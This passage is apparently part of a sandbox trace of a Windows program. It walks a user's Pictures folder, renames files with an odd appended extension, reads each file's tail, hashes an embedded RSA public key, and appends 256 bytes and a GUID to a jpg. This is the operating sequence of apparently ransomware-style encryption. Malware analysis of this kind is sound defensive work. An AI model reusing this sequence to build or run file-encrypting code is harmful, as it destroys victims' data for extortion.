wBKbSvaIoJ2e\\OHXi\\qtleeiZM0 T.gif.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\ohxi\\qtleeizm0 t.gif.npsg")) returned 1 [0239.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.352] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708b30 | out: hHeap=0x620000) returned 1 [0239.353] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b6e8ec0, ftCreationTime.dwHighDateTime=0x1d5b85b, ftLastAccessTime.dwLowDateTime=0x40a9b460, ftLastAccessTime.dwHighDateTime=0x1d5c4a1, ftLastWriteTime.dwLowDateTime=0x40a9b460, ftLastWriteTime.dwHighDateTime=0x1d5c4a1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r6Nxr", cAlternateFileName="")) returned 1 [0239.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eb50 [0239.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0239.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eb50 | out: hHeap=0x620000) returned 1 [0239.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.353] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b6e8ec0, ftCreationTime.dwHighDateTime=0x1d5b85b, ftLastAccessTime.dwLowDateTime=0x40a9b460, ftLastAccessTime.dwHighDateTime=0x1d5c4a1, ftLastWriteTime.dwLowDateTime=0x40a9b460, ftLastWriteTime.dwHighDateTime=0x1d5c4a1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r6Nxr", cAlternateFileName="")) returned 0 [0239.353] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0239.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0239.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0239.354] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0239.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0239.354] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0239.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0239.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0239.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0239.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0239.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0239.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.358] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\rJ-XhzoDCCMB9\\") returned="rJ-XhzoDCCMB9\\" [0239.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0239.358] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\") returned="2DVGfW2 wBKbSvaIoJ2e\\" [0239.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0239.359] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0239.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b867e0 [0239.359] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0239.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.359] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0239.359] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0239.359] PathFindFileNameW (pszPath="") returned="" [0239.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.359] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\rJ-XhzoDCCMB9\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89ca64d0, ftCreationTime.dwHighDateTime=0x1d5c1e2, ftLastAccessTime.dwLowDateTime=0x7982f250, ftLastAccessTime.dwHighDateTime=0x1d5c2bd, ftLastWriteTime.dwLowDateTime=0x7982f250, ftLastWriteTime.dwHighDateTime=0x1d5c2bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0239.359] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89ca64d0, ftCreationTime.dwHighDateTime=0x1d5c1e2, ftLastAccessTime.dwLowDateTime=0x7982f250, ftLastAccessTime.dwHighDateTime=0x1d5c2bd, ftLastWriteTime.dwLowDateTime=0x7982f250, ftLastWriteTime.dwHighDateTime=0x1d5c2bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0239.359] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73de60b0, ftCreationTime.dwHighDateTime=0x1d5badd, ftLastAccessTime.dwLowDateTime=0x4f5bfaf0, ftLastAccessTime.dwHighDateTime=0x1d5b820, ftLastWriteTime.dwLowDateTime=0x4f5bfaf0, ftLastWriteTime.dwHighDateTime=0x1d5b820, nFileSizeHigh=0x0, nFileSizeLow=0x2272, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bPdz.jpg", cAlternateFileName="")) returned 1 [0239.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0239.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x33b8188 [0239.359] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\rJ-XhzoDCCMB9\\bPdz.jpg") returned=".jpg" [0239.360] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\rJ-XhzoDCCMB9\\bPdz.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\rj-xhzodccmb9\\bpdz.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.360] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=8818) returned 1 [0239.360] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.362] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x224c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.362] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.364] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x2272, lpOverlapped=0x0) returned 1 [0239.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.365] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.366] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.366] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.366] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.366] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.366] GetLastError () returned 0x0 [0239.366] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.366] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.366] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.366] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.366] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.366] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.367] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x2272, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.367] WriteFile (in: hFile=0x644, lpBuffer=0x6affc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x6affc0*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.367] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.367] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, 